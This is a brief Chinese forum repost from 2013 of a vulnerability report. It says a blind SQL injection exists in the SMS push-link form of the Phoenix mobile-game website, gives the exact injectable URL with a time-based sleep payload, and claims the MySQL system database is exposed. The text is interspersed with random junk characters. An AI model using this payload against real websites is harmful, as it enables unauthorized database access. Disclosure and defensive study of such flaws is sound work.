简要描述:" z$ H+ `; a% Z }4 j3 e7 \& o
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。( D( ? E1 z( g5 f
2 p b& h. ~5 ?% Q! z2 F5 E详细说明:5 ]7 L; R: a8 N5 b) r$ ~! n
存在SQL盲注url:/ \9 O$ ?/ x+ `* N+ M' T
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=18 `9 o0 d' Z" h( D& b) O6 j
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png: |5 W4 e5 |$ P: n
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
4 a- X! _) O x* A9 h) Nhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg# }& S0 Q7 b$ M) g/ b% X, i) X
! M3 @, ]9 y' U6 a0 D能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对